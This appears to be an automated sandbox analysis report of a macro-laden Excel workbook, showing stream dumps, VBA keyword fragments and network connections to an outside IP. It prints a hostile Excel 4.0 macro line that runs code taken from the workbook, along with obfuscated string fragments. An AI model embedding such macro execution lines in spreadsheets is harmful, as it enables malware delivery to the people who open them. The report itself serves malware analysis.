Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . - b . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 a7 f5 2d 62 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code Keywords |
---|
Keyword |
---|
False |
VB_Exposed |
Attribute |
VB_Name |
VB_Creatable |
VB_PredeclaredId |
VB_GlobalNameSpace |
VB_Base |
VB_Customizable |
VB_TemplateDerived |
VBA Code |
---|
|
VBA File Name: ThisWorkbook.cls, Stream Size: 985 |
---|
General | |
---|---|
Stream Path: | _VBA_PROJECT_CUR/VBA/ThisWorkbook |
VBA File Name: | ThisWorkbook.cls |
Stream Size: | 985 |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 a7 f5 ab 7f 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code Keywords |
---|
Keyword |
---|
False |
VB_Exposed |
Attribute |
VB_Name |
VB_Creatable |
"ThisWorkbook" |
VB_PredeclaredId |
VB_GlobalNameSpace |
VB_Base |
VB_Customizable |
VB_TemplateDerived |
VBA Code |
---|
|
VBA File Name: UserForm1.frm, Stream Size: 2834 |
---|
General | |
---|---|
Stream Path: | _VBA_PROJECT_CUR/VBA/UserForm1 |
VBA File Name: | UserForm1.frm |
Stream Size: | 2834 |
Data ASCII: | . . . . . . . . . 0 . . . . . . . t . . . . . . . 8 . . . . . . . . . . . . . . . . . ^ R . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 01 00 01 f0 00 00 00 30 04 00 00 d4 00 00 00 74 02 00 00 ff ff ff ff 38 04 00 00 e0 07 00 00 00 00 00 00 01 00 00 00 a7 f5 5e 52 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code Keywords |
---|
Keyword |
---|
#FileNumber |
requirement |
Close |
Error |
VB_Name |
VB_Creatable |
/one" |
VB_Exposed |
xFileName |
FileNumber |
Empty |
String |
Resume |
Variant |
Output |
"c:\Users\Public" |
VB_Customizable |
#FileNumber, |
":jsoncronipont |
Replace("wsconroniponton |
"\Documents\" |
Range |
Dir(Path) |
Integer |
DelimChar |
VB_TemplateDerived |
False |
ThisWorkbook.BuiltinDocumentProperties("Keywords") |
Attribute |
Debug.Print |
Private |
VB_PredeclaredId |
VB_GlobalNameSpace |
VB_Base |
'Change |
FreeFile |
strFileExists |
VBA Code |
---|
|
Streams |
---|
Stream Path: \x1CompObj, File Type: data, Stream Size: 107 |
---|
General | |
---|---|
Stream Path: | \x1CompObj |
File Type: | data |
Stream Size: | 107 |
Entropy: | 4.18482950044 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . M i c r o s o f t E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . . |
Data Raw: | 01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 1f 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00 |
Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 424 |
---|
General | |
---|---|
Stream Path: | \x5DocumentSummaryInformation |
File Type: | data |
Stream Size: | 424 |
Entropy: | 3.70704949759 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . x . . . . . . . . . . . ` . . . . . . . h . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 . . . . . . . . . . . . . . . . . . . P m F b d w r 0 T u P . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S o u r c e D |
Data Raw: | fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 78 01 00 00 0b 00 00 00 01 00 00 00 60 00 00 00 02 00 00 00 68 00 00 00 0e 00 00 00 7c 00 00 00 0f 00 00 00 88 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00 16 00 00 00 b4 00 00 00 |
Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 220 |
---|
General | |
---|---|
Stream Path: | \x5SummaryInformation |
File Type: | data |
Stream Size: | 220 |
Entropy: | 3.13229188015 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . \\ . . . . . . . h . . . . . . . t . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . . . v . . . . . . . . . . . |
Data Raw: | fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 ac 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 05 00 00 00 5c 00 00 00 08 00 00 00 68 00 00 00 12 00 00 00 74 00 00 00 0c 00 00 00 8c 00 00 00 0d 00 00 00 98 00 00 00 13 00 00 00 a4 00 00 00 02 00 00 00 e3 04 00 00 |
Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 39260 |
---|
General | |
---|---|
Stream Path: | Workbook |
File Type: | Applesoft BASIC program data, first line number 16 |
Stream Size: | 39260 |
Entropy: | 4.61059933587 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . T 8 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 |
Data Raw: | 09 08 10 00 00 06 05 00 54 38 cd 07 c9 c0 01 00 06 07 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 |
Stream Path: _SX_DB_CUR/0001, File Type: data, Stream Size: 16815 |
---|
General | |
---|---|
Stream Path: | _SX_DB_CUR/0001 |
File Type: | data |
Stream Size: | 16815 |
Entropy: | 2.76744715124 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . A u t h o r " . . . E # . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . P r o d u c t . . . . . . . . . . . . . A l i c e M u t t o n . . . . . . . A n i s e e d S y r u p . . . . . . . B o s t o n C r a b M e a t . . . . . . . C a m e m b e r t P i e r r o t . . . . . . . C h e f A n t o n ' s C a j u n S e a s o n i n g . . . . . . . C h e f A n t o n ' s G u m b o M i x . . . . . . . F i l o M i x . . . . . . . G o r |
Data Raw: | c6 00 1b 00 15 01 00 00 01 00 03 00 1c 07 06 00 06 00 00 00 01 00 06 00 00 41 75 74 68 6f 72 22 01 0c 00 45 23 01 9f f7 fc e2 40 00 00 00 00 c7 00 18 00 81 14 00 00 00 00 19 00 00 00 00 00 19 00 07 00 00 50 72 6f 64 75 63 74 bb 01 02 00 00 00 cd 00 0f 00 0c 00 00 41 6c 69 63 65 20 4d 75 74 74 6f 6e cd 00 10 00 0d 00 00 41 6e 69 73 65 65 64 20 53 79 72 75 70 cd 00 13 00 10 00 00 42 |
Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 826 |
---|
General | |
---|---|
Stream Path: | _VBA_PROJECT_CUR/PROJECT |
File Type: | ASCII text, with CRLF line terminators |
Stream Size: | 826 |
Entropy: | 5.15315553776 |
Base64 Encoded: | True |
Data ASCII: | I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 4 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 5 / & H 0 0 0 0 0 0 0 0 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A |
Data Raw: | 49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30 |
Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 176 |
---|
General | |
---|---|
Stream Path: | _VBA_PROJECT_CUR/PROJECTwm |
File Type: | data |
Stream Size: | 176 |
Entropy: | 3.18343768922 |
Base64 Encoded: | False |
Data ASCII: | T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . S h e e t 4 . S . h . e . e . t . 4 . . . S h e e t 5 . S . h . e . e . t . 5 . . . U s e r F o r m 1 . U . s . e . r . F . o . r . m . 1 . . . . . |
Data Raw: | 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 53 68 65 65 74 34 00 53 00 68 00 65 00 65 00 74 00 34 00 00 00 53 68 65 65 74 |
Stream Path: _VBA_PROJECT_CUR/UserForm1/\x1CompObj, File Type: data, Stream Size: 97 |
---|
General | |
---|---|
Stream Path: | _VBA_PROJECT_CUR/UserForm1/\x1CompObj |
File Type: | data |
Stream Size: | 97 |
Entropy: | 3.61064918306 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . . |
Data Raw: | 01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00 |
Stream Path: _VBA_PROJECT_CUR/UserForm1/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 291 |
---|
General | |
---|---|
Stream Path: | _VBA_PROJECT_CUR/UserForm1/\x3VBFrame |
File Type: | ASCII text, with CRLF line terminators |
Stream Size: | 291 |
Entropy: | 4.60170100243 |
Base64 Encoded: | True |
Data ASCII: | V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 1 . . C a p t i o n = " U s e r F o r m 1 " . . C l i e n t H e i g h t = 3 1 6 5 . . C l i e n t L e f t = 4 5 . . C l i e n t T o p = 3 9 0 . . C l i e n t W i d t h = 4 7 1 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w n |
Data Raw: | 56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 31 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 31 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20 |
Stream Path: _VBA_PROJECT_CUR/UserForm1/f, File Type: data, Stream Size: 171 |
---|
General | |
---|---|
Stream Path: | _VBA_PROJECT_CUR/UserForm1/f |
File Type: | data |
Stream Size: | 171 |
Entropy: | 3.84288648278 |
Base64 Encoded: | False |
Data ASCII: | . . $ . . . . . . . . . . . . . . . . . . } . . t . . . . . . . . . . . . . . . R . . . . . . . . . . . K . Q . . . . . . D B . . . T a h o m a . . . . . . X . . . . . . . . . $ . . . . . . . . . . . . . 4 . . . . . . . T e x t B o x 1 O . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . 8 . . . . . . . L a b e l 1 . . " . . . { . . . |
Data Raw: | 00 04 24 00 08 0c 10 0c 02 00 00 00 ff ff 00 00 02 00 00 00 00 7d 00 00 74 20 00 00 cf 15 00 00 00 00 00 00 00 00 00 00 03 52 e3 0b 91 8f ce 11 9d e3 00 aa 00 4b b8 51 01 cc 00 00 90 01 44 42 01 00 06 54 61 68 6f 6d 61 00 00 02 00 00 00 58 00 00 00 00 82 01 00 00 00 24 00 e5 01 00 00 08 00 00 80 01 00 00 00 34 00 00 00 00 00 17 00 54 65 78 74 42 6f 78 31 4f 03 00 00 ca 05 00 00 00 |
Stream Path: _VBA_PROJECT_CUR/UserForm1/o, File Type: data, Stream Size: 108 |
---|
General | |
---|---|
Stream Path: | _VBA_PROJECT_CUR/UserForm1/o |
File Type: | data |
Stream Size: | 108 |
Entropy: | 3.31418568251 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . H . . . . . . ; . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . . . ( . . . . . . . L a b e l 1 . . . . . . { . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . |
Data Raw: | 00 02 14 00 01 01 00 80 00 00 00 00 1b 48 00 ac ce 18 00 00 3b 0a 00 00 00 02 18 00 35 00 00 00 06 00 00 80 a5 00 00 00 cc 02 00 00 54 61 68 6f 6d 61 00 00 00 02 18 00 28 00 00 00 06 00 00 80 4c 61 62 65 6c 31 00 00 ec 09 00 00 7b 02 00 00 00 02 18 00 35 00 00 00 06 00 00 80 a5 00 00 00 cc 02 00 00 54 61 68 6f 6d 61 00 00 |
Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 4896 |
---|
General | |
---|---|
Stream Path: | _VBA_PROJECT_CUR/VBA/_VBA_PROJECT |
File Type: | data |
Stream Size: | 4896 |
Entropy: | 4.8370296249 |
Base64 Encoded: | False |
Data ASCII: | . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . , . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . . ( . x . 8 . 6 . ) . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . |
Data Raw: | cc 61 a3 00 00 01 00 ff 00 20 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 2c 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00 |
Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 1828 |
---|
General | |
---|---|
Stream Path: | _VBA_PROJECT_CUR/VBA/__SRP_0 |
File Type: | data |
Stream Size: | 1828 |
Entropy: | 4.3476580333 |
Base64 Encoded: | False |
Data ASCII: | . K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . . . . . . . . . . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . % . . . . 9 ] H . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 93 4b 2a a3 01 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 01 00 00 00 00 00 01 00 02 00 01 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 80 01 00 00 80 00 00 00 80 00 00 00 80 00 00 00 04 00 00 7e 05 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 68 00 00 7f |
Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 191 |
---|
General | |
---|---|
Stream Path: | _VBA_PROJECT_CUR/VBA/__SRP_1 |
File Type: | data |
Stream Size: | 191 |
Entropy: | 3.30829134406 |
Base64 Encoded: | False |
Data ASCII: | r U . . . . . . . . . . . . . . . . . . . ~ } . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . s e c o n d s . . . . . . . . D e l i m i t e r . . . . . . . . I g n o r e _ E m p t y . . . . . . . . T e x t 1 a . . . . . . . |
Data Raw: | 72 55 80 00 00 00 80 00 00 00 80 00 00 00 80 00 00 00 01 00 00 7e 7d 00 00 7f 00 00 00 00 0a 00 00 00 09 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff 09 00 00 00 00 00 03 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 03 00 00 09 a1 03 00 00 00 00 00 00 81 08 00 00 00 00 00 00 08 00 00 00 00 00 01 00 02 00 00 08 07 00 00 00 73 65 |
Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2, File Type: data, Stream Size: 384 |
---|
General | |
---|---|
Stream Path: | _VBA_PROJECT_CUR/VBA/__SRP_2 |
File Type: | data |
Stream Size: | 384 |
Entropy: | 2.45306416855 |
Base64 Encoded: | False |
Data ASCII: | r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 . . . . . . . Y . . . . . . . . . . . . . . . . . . . . . . . 4 . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . . . . ` . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 1e 00 00 00 09 00 00 00 00 00 00 00 09 00 00 00 00 00 03 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 00 00 01 00 09 08 00 00 00 00 00 00 31 08 00 00 00 00 00 00 59 08 00 00 00 00 00 00 ff ff ff ff e1 07 00 00 00 00 00 00 08 00 18 00 34 00 00 00 81 08 00 00 00 00 00 00 61 00 00 00 00 00 01 00 a9 08 |
Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3, File Type: data, Stream Size: 294 |
---|
General | |
---|---|
Stream Path: | _VBA_PROJECT_CUR/VBA/__SRP_3 |
File Type: | data |
Stream Size: | 294 |
Entropy: | 2.65487119554 |
Base64 Encoded: | False |
Data ASCII: | r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . ( . . . . . . . . . . . . ` . . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . & 8 . A . . . . . . . . . . ` . . e . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 # o . . 0 $ . . . . . . . . . . . . ` . . i . . . . . . . . . . . . . . . . . . . . $ . . . . . . . . . . . . ` . . l . . . . . . . . . . . . . . . . . . . . $ . . . . . . . . . . . . |
Data Raw: | 72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 10 00 00 00 09 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff 00 00 00 00 40 00 00 00 04 00 28 00 01 01 00 00 00 00 02 00 00 00 03 60 04 00 61 02 ff ff ff ff ff ff ff ff ff ff 00 00 00 00 81 00 00 00 00 00 01 00 00 00 00 00 1e 26 38 00 41 01 00 00 00 00 02 00 01 00 03 60 10 fd 65 02 ff ff ff ff ff ff ff ff ff ff 00 00 |
Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: MIPSEL-BE Ucode, Stream Size: 902 |
---|
General | |
---|---|
Stream Path: | _VBA_PROJECT_CUR/VBA/dir |
File Type: | MIPSEL-BE Ucode |
Stream Size: | 902 |
Entropy: | 6.58076213885 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . B . a . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . - |
Data Raw: | 01 82 b3 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 c2 42 a1 61 01 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47 |
Macro 4.0 Code |
---|
"=RETURN(EXEC(GET.WORKBOOK(36,DOCUMENTS(1))))",,=1+1
Network Behavior |
---|
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Nov 19, 2020 08:40:53.752295971 CET | 49165 | 443 | 192.168.2.22 | 104.27.173.15 |
Nov 19, 2020 08:40:53.781735897 CET | 443 | 49165 | 104.27.173.15 | 192.168.2.22 |
Nov 19, 2020 08:40:53.781933069 CET | 49165 | 443 | 192.168.2.22 | 104.27.173.15 |
Nov 19, 2020 08:40:53.806364059 CET | 49165 | 443 | 192.168.2.22 | 104.27.173.15 |
Nov 19, 2020 08:40:53.835467100 CET | 443 | 49165 | 104.27.173.15 | 192.168.2.22 |
Nov 19, 2020 08:40:53.839006901 CET | 443 | 49165 | 104.27.173.15 | 192.168.2.22 |
Nov 19, 2020 08:40:53.839088917 CET | 443 | 49165 | 104.27.173.15 | 192.168.2.22 |
Nov 19, 2020 08:40:53.839147091 CET | 49165 | 443 | 192.168.2.22 | 104.27.173.15 |
Nov 19, 2020 08:40:53.839207888 CET | 49165 | 443 | 192.168.2.22 | 104.27.173.15 |
Nov 19, 2020 08:40:53.850289106 CET | 49165 | 443 | 192.168.2.22 | 104.27.173.15 |
Nov 19, 2020 08:40:53.879415989 CET | 443 | 49165 | 104.27.173.15 | 192.168.2.22 |
Nov 19, 2020 08:40:53.879542112 CET | 443 | 49165 | 104.27.173.15 | 192.168.2.22 |
Nov 19, 2020 08:40:53.879632950 CET | 49165 | 443 | 192.168.2.22 | 104.27.173.15 |
Nov 19, 2020 08:40:54.129385948 CET | 49165 | 443 | 192.168.2.22 | 104.27.173.15 |
Nov 19, 2020 08:40:54.158127069 CET | 443 | 49165 | 104.27.173.15 | 192.168.2.22 |
Nov 19, 2020 08:40:55.589656115 CET | 443 | 49165 | 104.27.173.15 | 192.168.2.22 |
Nov 19, 2020 08:40:55.589684010 CET | 443 | 49165 | 104.27.173.15 | 192.168.2.22 |
Nov 19, 2020 08:40:55.589739084 CET | 49165 | 443 | 192.168.2.22 | 104.27.173.15 |
Nov 19, 2020 08:40:55.589771032 CET | 49165 | 443 | 192.168.2.22 | 104.27.173.15 |
Nov 19, 2020 08:40:55.596419096 CET | 49165 | 443 | 192.168.2.22 | 104.27.173.15 |
Nov 19, 2020 08:40:55.596463919 CET | 49165 | 443 | 192.168.2.22 | 104.27.173.15 |
Nov 19, 2020 08:40:55.942521095 CET | 49166 | 443 | 192.168.2.22 | 104.27.173.15 |
Nov 19, 2020 08:40:55.972171068 CET | 443 | 49166 | 104.27.173.15 | 192.168.2.22 |
Nov 19, 2020 08:40:55.972302914 CET | 49166 | 443 | 192.168.2.22 | 104.27.173.15 |
Nov 19, 2020 08:40:55.973593950 CET | 49166 | 443 | 192.168.2.22 | 104.27.173.15 |
